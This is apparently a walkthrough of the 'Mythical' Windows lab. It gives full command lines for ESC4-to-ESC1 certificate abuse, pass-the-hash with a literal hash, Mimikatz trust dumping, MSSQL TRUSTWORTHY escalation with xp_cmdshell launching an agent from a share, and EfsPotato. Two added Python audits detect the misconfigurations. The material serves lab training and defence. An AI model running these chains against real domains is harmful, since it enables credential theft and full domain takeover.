Mythical is a medium-difficulty Windows lab that simulates a post-breach assessment within a network hardened after a prior ransomware attack. Initial access is gained through a pre-established Mythic C2 session, allowing enumeration of internal infrastructure via a VPN tunnel. Backup misconfigurations expose sensitive data over rsync, leading to credential recovery from a KeePass database. Active Directory misconfigurations are exploited by escalating an ESC4 certificate template to ESC1, enabling certificate-based impersonation of a domain admin. Cross-domain trust abuse is performed by extracting the trust account hash and reusing it to access another domain, ultimately uncovering embedded credentials in a .NET binary. Privilege escalation is achieved by exploiting the TRUSTWORTHY setting in MSSQL to execute commands as sysadmin, and further access is gained using EfsPotato via SeImpersonate privileges—demonstrating how chained misconfigurations can still lead to complete domain compromise in an environment believed to be secured.

Enumeration

After signing in with the provided credentials, we’re presented with the Mythic C2 dashboard:

We can see two agents, one of which is active.

For an interactive shell, we can set both the interval and jitter time to 0. (Note: This is not recommended during real-world engagements.)

As we already have a domain-joined account, we use SharpHound to collect domain-related information.

Port Scan

The user momo is part of two interesting groups: Backup Admins and OpenVPN Administrators.

The IP configuration shows an active OpenVPN connection.

We scan the VPN IP range and identify DC01 and the Mythic server. Scanning more internal IPs later reveals another DC, DC02.

Rsync

In the _install folder, we find the sqlcmd installer, indicating a MSSQL server is present.
In the _admin directory, we find an rsync binary, suggesting rsync was used for backups.

Using an rsync client, we enumerate DC01’s backup directory, which contains the first flag and a KeePass database.

rsync.exe -av --list-only rsync://192.168.25.1
rsync.exe -av rsync://192.168.25.1/mythical /temp

ADCS

KeePass

The database version isn’t supported by keepass2john.

We use keepass4brute to brute-force it using the CLI version of KeePass.

Once unlocked, we recover credentials for the domjoin user.

ESC 4

We use Certify to enumerate certificate templates and identify one vulnerable to ESC4. It allows enrollment and object control permissions for domain-joined computers.

Since momo lacks machine account creation privileges, we impersonate domjoin and create a new machine account using StandIn.

make_token mythical-US\domjoin <password>
execute_assembly -Assembly StandIn.exe -Arguments --computer szz --make

We then impersonate this new machine account.

Using PowerView, we modify the vulnerable certificate template to:

  1. Allow domain users to enroll.

  2. Enable impersonation of any user.

  3. Make the template valid for client authentication.

#Enrollment Rights
Add-DomainObjectAcl -TargetIdentity Machine -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=mythical-us,DC=vl"

#Impersonate Any Users
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mythical-us,DC=vl" -Identity Machine -XOR @{'mspki-certificate-name-flag'=1} -Verbose

#Authentication Rights
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mythical-us,DC=vl" -Identity Machine -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose
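As an added defensive check (not part of the writeup or of PowerView), the audit below flags any template whose attributes match the state the Machine template was just put into: enrollee-supplied subject, a client-authentication EKU, and enrollment rights for a low-privilege group. It goes slightly beyond the three changes above by also testing the manager-approval and authorized-signature conditions that ESC1 requires. The template records are constructed dicts keyed by the same LDAP attribute names used above.

```python
# Added audit logic (not from the writeup): detect templates in an ESC1 state.
# Template records are constructed samples mirroring the LDAP attributes PowerView set.

ENROLL_GUID = "0e10c968-78fb-11d2-90d4-00c04f79dc55"   # Certificate-Enrollment extended right
CLIENT_AUTH_OID = "1.3.6.1.5.5.7.3.2"                  # Client Authentication EKU
ENROLLEE_SUPPLIES_SUBJECT = 0x1                        # bit in mspki-certificate-name-flag
PEND_ALL_REQUESTS = 0x2                                # bit in mspki-enrollment-flag (manager approval)
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

def esc1_reasons(tpl):
    """Return the ESC1 conditions a template meets; all four together means exploitable."""
    reasons = []
    if tpl["mspki-certificate-name-flag"] & ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("enrollee supplies subject")
    ekus = tpl["mspki-certificate-application-policy"]
    if not ekus or CLIENT_AUTH_OID in ekus:   # an empty EKU list also permits client auth
        reasons.append("client authentication")
    if not (tpl["mspki-enrollment-flag"] & PEND_ALL_REQUESTS) and tpl["mspki-ra-signature"] == 0:
        reasons.append("no approval or signature required")
    enrollers = {a["principal"] for a in tpl["aces"] if a["right"] == ENROLL_GUID} & LOW_PRIV
    if enrollers:
        reasons.append("enrollable by " + ", ".join(sorted(enrollers)))
    return reasons

def audit(templates):
    """Map template name -> reasons for every template that satisfies all ESC1 conditions."""
    findings = {}
    for tpl in templates:
        reasons = esc1_reasons(tpl)
        if len(reasons) == 4:
            findings[tpl["name"]] = reasons
    return findings

TEMPLATES = [  # constructed: the modified Machine template and an untouched User template
    {"name": "Machine", "mspki-certificate-name-flag": 0x1, "mspki-enrollment-flag": 0x20,
     "mspki-ra-signature": 0, "mspki-certificate-application-policy": [CLIENT_AUTH_OID],
     "aces": [{"principal": "Domain Users", "right": ENROLL_GUID},
              {"principal": "Domain Computers", "right": ENROLL_GUID}]},
    {"name": "User", "mspki-certificate-name-flag": 0xA2000000, "mspki-enrollment-flag": 0x29,
     "mspki-ra-signature": 0, "mspki-certificate-application-policy": [CLIENT_AUTH_OID],
     "aces": [{"principal": "Domain Users", "right": ENROLL_GUID}]},
]

if __name__ == "__main__":
    for name, why in audit(TEMPLATES).items():
        print(f"ESC1: {name}: {'; '.join(why)}")
```

The User template is not flagged only because its name-flag lacks the enrollee-supplies-subject bit; the XOR above is exactly the change that would tip it over.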

ESC 1

We now abuse the modified template to impersonate a Domain Administrator and request a certificate.
execute_assembly -Assembly Certify.exe -Arguments request /ca:dc01.mythical-us.vl\mythical-us-DC01-CA /template:Machine /altname:[email protected]

We convert the returned PEM certificate and key into a .pfx using OpenSSL.
openssl pkcs12 -in admin.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

We then use Rubeus to get a TGT and extract credentials.
execute_assembly -Assembly Rubeus.exe -Arguments asktgt /user:Administrator /certificate:c:\windows\tasks\cert.pfx /ptt /nowrap /getcredentials

Finally, we use Pass-the-Hash to execute a beacon as Administrator.
powershell Invoke-SMBExec -Target 10.10.159.5 -Username administrator -Domain mythical-us.vl -Hash C583EF48C5ED66C727AECB6FAB87AC12 -Command "c:\programdata\google\update.exe"

Trust Account Abuse

BloodHound reveals a one-way trust from MYTHICAL-EU.VL to MYTHICAL-US.VL, allowing US users to authenticate in EU.

We dump the trust account NTLM hash using Mimikatz.
mimikatz "lsadump::trust /patch"

We use this hash with Rubeus to authenticate to MYTHICAL-EU.VL.
execute_assembly -Assembly Rubeus.exe -Arguments asktgt /user:MYTHICAL-US$ /domain:MYTHICAL-EU.VL /rc4:eb921a2b0e9d626559dab0f54fdc6498 /nowrap /ptt

Using this ticket, we enumerate shares on DC02 and discover getusers.exe, a .NET binary.

Disassembling it reveals credentials for svc_ldap.

Privilege Escalation

MSSQL - TRUSTWORTHY Abuse

With svc_ldap credentials, we enumerate AD users on DC02.
Get-ADUser -Filter * -Server "dc02.mythical-eu.vl" -Property DisplayName, SamAccountName | Select-Object DisplayName, SamAccountName

Companies often reuse passwords across their service and administrative accounts. We check whether the svc_ldap password also works for svc_sql on the MSSQL server.
shell C:\windows\tasks\sql.exe -S tcp:10.10.153.71,1433 -Q "SELECT name, database_id, create_date FROM sys.databases;"

We identify that MSDB is TRUSTWORTHY and owned by svc_sql, allowing privilege escalation.

# Trusted Database
shell C:\windows\tasks\sql.exe -S tcp:10.10.153.71,1433 -Q "SELECT a.name,b.is_trustworthy_on FROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name;"

# Owners
shell C:\windows\tasks\sql.exe -S tcp:10.10.153.71,1433 -d msdb -Q "SELECT rp.name as database_role, mp.name as database_user from sys.database_role_members drm join sys.database_principals rp on (drm.role_principal_id = rp.principal_id) join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)"

Next, we’ll use the svc_sql account to create a new stored procedure, escalate its privileges by assigning it the sysadmin role on the SQL server, and then enable xp_cmdshell to execute system commands.

# Give Sysadmin Rights
shell C:\windows\tasks\sql.exe -S tcp:10.10.153.71,1433 -d msdb -Q "CREATE OR ALTER PROCEDURE dbo.sz WITH EXECUTE AS owner AS ALTER SERVER ROLE sysadmin ADD MEMBER [MYTHICAL-EU\svc_sql];"
shell C:\windows\tasks\sql.exe -S tcp:10.10.153.71,1433 -d msdb -Q "EXEC dbo.sz;"

# Enable XP_CMDSHELL
shell C:\windows\tasks\sql.exe -S tcp:10.10.153.71,1433 -d msdb -Q "EXEC sp_configure 'show advanced options', 1; Reconfigure;"
shell C:\windows\tasks\sql.exe -S tcp:10.10.153.71,1433 -d msdb -Q "EXEC sp_configure 'xp_cmdshell', 1; Reconfigure;"
shell C:\windows\tasks\sql.exe -S tcp:10.10.153.71,1433 -d msdb -Q "EXEC xp_cmdshell 'whoami'"

We host our agent on a shared folder from DC01 and execute it via xp_cmdshell.

# Accessible server
mkdir -Path C:\temp
shell net share temp=C:\temp /grant:everyone,full
cp -Source c:\programdata\google\update.exe -Destination C:\temp\update.exe

# Agent Callback
shell C:\windows\tasks\sql.exe -S tcp:10.10.153.71,1433 -d msdb -Q "EXEC xp_cmdshell '\\10.10.153.69\temp\update.exe'"
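As an added defensive check (not part of the writeup), the audit below reproduces the two catalog queries above over constructed result sets and reports only the combination that actually yields sysadmin through EXECUTE AS OWNER: a database with TRUSTWORTHY on, owned by a sysadmin login, in which a non-sysadmin principal holds db_owner. It also emits the T-SQL that cuts the path; since msdb ships with TRUSTWORTHY on, the fix there is the role membership, not the flag. All rows and login names are constructed samples.

```python
# Added audit logic (not from the writeup): find the TRUSTWORTHY escalation path.
# Row shapes mirror sys.databases, sys.database_role_members and sysadmin membership.

DATABASES = [  # constructed sample: name, is_trustworthy_on, owner login
    {"name": "master", "is_trustworthy_on": 0, "owner": "sa"},
    {"name": "msdb",   "is_trustworthy_on": 1, "owner": "sa"},
    {"name": "hr",     "is_trustworthy_on": 1, "owner": "MYTHICAL-EU\\svc_app"},
]
DB_ROLE_MEMBERS = [  # constructed sample: database, role, member
    {"database": "msdb", "role": "db_owner",     "member": "MYTHICAL-EU\\svc_sql"},
    {"database": "msdb", "role": "db_datareader", "member": "MYTHICAL-EU\\svc_report"},
    {"database": "hr",   "role": "db_owner",     "member": "MYTHICAL-EU\\svc_app"},
]
SYSADMINS = {"sa"}  # constructed sample of sysadmin server-role members

def trustworthy_escalations(databases, role_members, sysadmins):
    """Return {database: [db_owner principals who can reach sysadmin via EXECUTE AS OWNER]}."""
    findings = {}
    for db in databases:
        # Without both conditions, a procedure run as the owner does not carry a sysadmin token
        if not db["is_trustworthy_on"] or db["owner"] not in sysadmins:
            continue
        risky = sorted(m["member"] for m in role_members
                       if m["database"] == db["name"] and m["role"] == "db_owner"
                       and m["member"] not in sysadmins)
        if risky:
            findings[db["name"]] = risky
    return findings

def remediation(findings):
    """T-SQL statements that close each finding; msdb keeps TRUSTWORTHY ON by design."""
    stmts = []
    for db, members in findings.items():
        for member in members:
            stmts.append(f"USE [{db}]; ALTER ROLE db_owner DROP MEMBER [{member}];")
        if db != "msdb":
            stmts.append(f"ALTER DATABASE [{db}] SET TRUSTWORTHY OFF;")
    return stmts

if __name__ == "__main__":
    found = trustworthy_escalations(DATABASES, DB_ROLE_MEMBERS, SYSADMINS)
    for db, members in found.items():
        print(f"{db}: db_owner held by {', '.join(members)}")
    print("\n".join(remediation(found)))
```

The hr database is deliberately not reported: it is TRUSTWORTHY, but its owner is not a sysadmin, so EXECUTE AS OWNER would only yield that owner's rights.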

SeImpersonate

The current user has SeImpersonatePrivilege.

We use EfsPotato to impersonate an admin and execute our agent.
execute_assembly -Assembly EfsPotato_4.0_x64.exe -Arguments \\10.10.153.69\temp\update.exe